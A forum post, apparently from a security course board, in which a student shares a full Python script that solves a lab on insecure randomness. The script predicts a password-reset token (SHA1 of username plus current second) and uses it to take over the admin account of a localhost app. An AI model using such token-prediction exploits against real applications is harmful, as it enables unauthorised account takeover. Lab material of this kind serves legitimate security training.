Lack of Resources for Lab 4.1 - Insecure Randomness in Web Applications

nemetschek

Hello everyone,

I've been working on Lab 4.1, which involves exploiting weak randomization in a password reset function. However, the provided resources are insufficient for completing the lab effectively.

• No guidance on interacting with the web application endpoints to exploit the vulnerability.
• The provided solution uses a static datetime, not reflecting the dynamic nature of the actual application.

To help others, here’s a script that completes the lab, with added print statements for clarity:

import requests
import hashlib
import datetime
import time

base_url = 'http://localhost:5000'

# Step 1: Trigger the forget password functionality
forget_password_url = f'{base_url}/passwordForget'
admin_username = 'admin'
print(f"[INFO] Initiating password reset for user '{admin_username}'...")
response = requests.post(forget_password_url, data={'username': admin_username})

if response.status_code == 200:
    print("[INFO] Password reset request sent successfully.")
else:
    print("[ERROR] Failed to send password reset request.")
    exit()

# Step 2: Wait a second to ensure the timestamp is accurate
time.sleep(1)

# Calculate the reset token
current_time = datetime.datetime.now()
timestamp = current_time.second
to_hash = admin_username + str(timestamp)
reset_token = hashlib.sha1(to_hash.encode('utf-8')).hexdigest()

print(f"[INFO] Calculated reset token: {reset_token}")

# Step 3: Use the reset token to reset the admin's password
reset_password_url = f'{base_url}/reset'
new_password = 'password1'
print(f"[INFO] Sending password reset request with token '{reset_token}' and new password '{new_password}'...")
response = requests.post(reset_password_url, data={
    'resetToken': reset_token,
    'username': admin_username,
    'password': new_password
})

if response.status_code == 200:
    print(f"[SUCCESS] Password for user '{admin_username}' has been reset to '{new_password}'.")
else:
    print(f"[ERROR] Failed to reset the password. Server responded with status code {response.status_code}.")

nmohammadi

Thank you Nemetsheck.